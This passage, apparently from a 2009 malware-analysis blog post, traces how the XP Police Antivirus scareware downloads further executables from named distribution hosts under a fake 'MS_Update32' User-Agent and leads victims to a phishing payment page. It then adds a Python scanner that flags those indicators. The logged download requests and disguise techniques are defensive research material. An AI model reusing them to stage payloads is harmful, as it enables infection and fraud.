But, in a manner that is fully transparent to the user, it triggers a series of actions that complete the scareware's work. By listening to the traffic, we see the following components being downloaded:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

This downloads setupc.dat, which is not a data file but a compressed file holding a copy of the other files, which are uncompressed into C:\Program Files\XPPoliceAntivirus.

GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

This downloads sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0), which is used to compress (pack) the malware at runtime in an attempt to avoid detection by antivirus programs.

GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

Although it is served with a generic application/octet-stream content type, the response body begins with the MZ header and the "This program cannot be run in DOS mode" stub, i.e. it is a Windows executable.

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0
2

GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

The JavaScript file window.js displays an on-screen pop-up window with the caption "Thank you for Installation!".

GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page for purchasing the scareware, where the victim's sensitive and financial information is requested. It is a scam/phishing page.
The maneuvers used by malicious code are becoming more aggressive and effective: as we have seen, the installer downloaded in the first instance is only one piece of the puzzle, from which the scareware fetches the remaining pieces.
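As an added example (not part of the original post or its author's tooling), the following Python scanner applies the indicators visible in this capture, the non-browser User-Agent strings MS_Update32 and wget 3.0, the two distribution hosts, and executable or .dat payload fetches, to a plain-text HTTP request log; the sample capture and the benign example.org request are constructed.

```python
import re
# Indicators taken from the capture in this post: the downloader's User-Agent
# strings, the hosts it contacts and the payload file types it fetches.
SUSPECT_USER_AGENTS = {"MS_Update32", "wget 3.0"}
SUSPECT_HOSTS = {"setupdatdownload.com", "xp-police-09.com", "www.xp-police-09.com"}
PAYLOAD_RE = re.compile(r"\.(exe|dat)$", re.IGNORECASE)
REQUEST_LINE_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")

def parse_requests(capture: str) -> list:
    """Split a plain-text capture into (method, path, headers) tuples."""
    requests = []
    for line in capture.splitlines():
        m = REQUEST_LINE_RE.match(line)
        if m:
            requests.append((m.group(1), m.group(2), {}))
        elif requests and ": " in line:
            name, value = line.split(": ", 1)
            requests[-1][2][name] = value  # header belongs to the last request
    return requests

def flag_request(path: str, headers: dict) -> list:
    """Return the reasons a request looks like the scareware's download stage."""
    reasons = []
    ua = headers.get("User-Agent", "")
    host = headers.get("Host", "")
    if ua in SUSPECT_USER_AGENTS:
        reasons.append(f"non-browser User-Agent {ua!r}")
    if host in SUSPECT_HOSTS:
        reasons.append(f"known scareware host {host}")
        if PAYLOAD_RE.search(path):
            reasons.append(f"payload fetch {path}")
    return reasons

def scan_capture(capture: str) -> dict:
    """Map each 'METHOD path' in the capture to its list of alert reasons."""
    return {f"{m} {p}": flag_request(p, h) for m, p, h in parse_requests(capture)}

# Constructed sample: request lines from the post plus one benign request (example.org).
SAMPLE_CAPTURE = """GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: example.org
"""
for key, reasons in scan_capture(SAMPLE_CAPTURE).items():
    print(key, "->", reasons or "clean")
```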
Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering
# Jorge Mieres